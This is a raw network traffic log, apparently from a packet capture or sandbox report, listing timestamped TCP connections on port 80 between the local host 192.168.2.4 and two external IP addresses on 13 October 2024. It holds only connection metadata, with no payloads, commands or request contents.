Oct 13, 2024 18:28:12.403913021 CEST	80	65082	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:12.404006958 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.404227972 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.407248974 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.409064054 CEST	80	65082	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:12.412242889 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:12.412436962 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.412687063 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.412687063 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:12.417776108 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:12.417818069 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.359931946 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.361891031 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.361964941 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.362041950 CEST	65092	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.364820004 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.366909981 CEST	80	65092	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.369702101 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.370102882 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.370277882 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.370277882 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:13.375320911 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:13.375349998 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.317760944 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.318645954 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.318727970 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.336577892 CEST	65099	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.341597080 CEST	80	65099	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.874433994 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.879658937 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.879870892 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.879990101 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.879990101 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:14.884979010 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:14.885008097 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.827591896 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.828577995 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.828923941 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.830322027 CEST	65105	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.831439972 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.835700989 CEST	80	65105	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.836549997 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.836635113 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.840307951 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.840347052 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:15.845371008 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:15.845386028 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.790606976 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.790745974 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.790815115 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.790896893 CEST	65115	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.795906067 CEST	80	65115	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.798844099 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.803783894 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.803915977 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.804027081 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.804059982 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:16.809787035 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:16.809815884 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.753078938 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.753123045 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.753341913 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.762639999 CEST	65122	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.767564058 CEST	80	65122	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.806852102 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.812514067 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.812601089 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.812771082 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.812810898 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:17.817683935 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:17.817768097 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.774601936 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.775686979 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.775757074 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.775999069 CEST	65128	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.778984070 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.780981064 CEST	80	65128	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.784069061 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.784166098 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.784312963 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.784347057 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:18.789195061 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:18.789247990 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.727567911 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.728682041 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.728904009 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.729233027 CEST	65134	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.734323978 CEST	80	65134	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.734853029 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.739847898 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.739960909 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.740135908 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.740176916 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:19.744988918 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:19.745142937 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:20.703269005 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:20.704267979 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:20.704700947 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:20.709239960 CEST	65140	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:20.714406967 CEST	80	65140	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:25.650063038 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:25.655219078 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:25.655355930 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:25.655539989 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:25.655575037 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:25.660574913 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:25.660605907 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:26.607275963 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:26.607450962 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:26.607711077 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:26.610852957 CEST	65270	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:26.615865946 CEST	80	65270	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:27.826234102 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:27.831506014 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:27.831624985 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:27.831768036 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:27.831768990 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:27.836638927 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:27.836807013 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:28.770073891 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:28.771136045 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:28.771259069 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:28.771318913 CEST	65271	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:28.776321888 CEST	80	65271	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:29.086436033 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:29.091653109 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:29.091912031 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:29.091999054 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:29.092036963 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:29.097230911 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:29.097259998 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.032151937 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.033135891 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.033310890 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.059278011 CEST	65272	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.064582109 CEST	80	65272	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.597359896 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.603868961 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.603980064 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.604149103 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.604204893 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:30.609294891 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:30.609323978 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.548640966 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.548719883 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.548788071 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.548968077 CEST	65273	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.554034948 CEST	80	65273	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.759579897 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.764739990 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.764832020 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.764997005 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.765028000 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:31.769836903 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:31.769892931 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:32.705795050 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:32.705883026 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:32.705945015 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:32.706151009 CEST	65274	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:32.711270094 CEST	80	65274	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:37.420042038 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:37.425733089 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:37.426176071 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:37.426177025 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:37.426275969 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:37.431365967 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:37.431417942 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:38.369604111 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:38.369868994 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:38.370062113 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:38.374594927 CEST	65275	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:38.379633904 CEST	80	65275	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:42.453030109 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:42.458642006 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:42.459079981 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:42.459172010 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:42.459172010 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:42.464067936 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:42.464165926 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:43.415448904 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:43.415518999 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:43.415783882 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:43.422976017 CEST	65276	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:43.427985907 CEST	80	65276	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:47.519145966 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:47.524502993 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:47.524744987 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:47.524832010 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:47.524864912 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:47.529989958 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:47.530004025 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:48.485850096 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:48.487097979 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:48.487283945 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:48.487400055 CEST	65277	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:48.492595911 CEST	80	65277	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:52.678787947 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:52.684046984 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:52.684268951 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:52.684465885 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:52.684540987 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:52.689568043 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:52.689577103 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:53.627422094 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:53.628232002 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:53.628328085 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:53.630148888 CEST	65278	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:53.635132074 CEST	80	65278	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:58.712245941 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:58.718581915 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:58.718908072 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:58.718908072 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:58.718909025 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:58.724266052 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:58.724297047 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:59.680485964 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:59.682029963 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:29:59.682272911 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:59.685296059 CEST	65279	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:29:59.690716982 CEST	80	65279	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:05.138192892 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:05.143424034 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:05.143526077 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:05.143635035 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:05.143667936 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:05.148509979 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:05.148673058 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:06.085484028 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:06.086147070 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:06.086267948 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:06.086997032 CEST	65280	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:06.091850996 CEST	80	65280	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:11.310967922 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:11.316101074 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:11.316200972 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:11.316328049 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:11.316346884 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:11.321192026 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:11.321223021 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:12.261116028 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:12.261282921 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:12.261434078 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:12.263565063 CEST	65281	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:30:12.268507957 CEST	80	65281	148.230.249.9	192.168.2.4
Oct 13, 2024 18:30:20.010098934 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:20.015103102 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:20.015494108 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:20.015578032 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:20.015578032 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:20.020554066 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:20.020781994 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:21.478468895 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:21.478521109 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:21.478549957 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:21.478584051 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:21.478641033 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:21.478641987 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:21.478907108 CEST	65282	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:21.483680964 CEST	80	65282	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:26.123940945 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:26.129339933 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:26.129496098 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:26.129671097 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:26.129710913 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:26.134785891 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:26.134815931 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:27.201457977 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:27.201617002 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:27.201694012 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:27.209893942 CEST	65283	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:27.215029955 CEST	80	65283	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:32.347740889 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:32.353072882 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:32.353173971 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:32.353360891 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:32.353400946 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:32.358455896 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:32.358616114 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:33.412847996 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:33.412944078 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:33.413089037 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:33.414274931 CEST	65284	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:33.419094086 CEST	80	65284	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:38.902930975 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:38.908217907 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:38.908505917 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:38.908505917 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:38.908505917 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:38.913501024 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:38.913532019 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:39.981079102 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:39.987359047 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:39.987751007 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:39.987751961 CEST	65285	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:39.992949963 CEST	80	65285	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:44.553365946 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:44.558906078 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:44.559143066 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:44.559293985 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:44.559294939 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:44.564346075 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:44.564374924 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:45.632917881 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:45.632966995 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:45.633160114 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:45.633161068 CEST	65286	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:45.638246059 CEST	80	65286	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:50.964096069 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:50.969412088 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:50.969518900 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:50.969672918 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:50.969698906 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:50.974596024 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:50.974745989 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:52.041395903 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:52.041446924 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:52.041560888 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:52.041975021 CEST	65287	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:52.048170090 CEST	80	65287	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:56.473633051 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:56.478847980 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:56.479007006 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:56.479343891 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:56.479343891 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:56.484225988 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:56.484360933 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:57.539180040 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:57.539336920 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:30:57.539699078 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:57.539700031 CEST	65288	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:30:57.544656038 CEST	80	65288	190.156.239.49	192.168.2.4
Oct 13, 2024 18:31:03.435033083 CEST	65289	80	192.168.2.4	190.156.239.49
Oct 13, 2024 18:31:03.440574884 CEST	80	65289	190.156.239.49	192.168.2.4
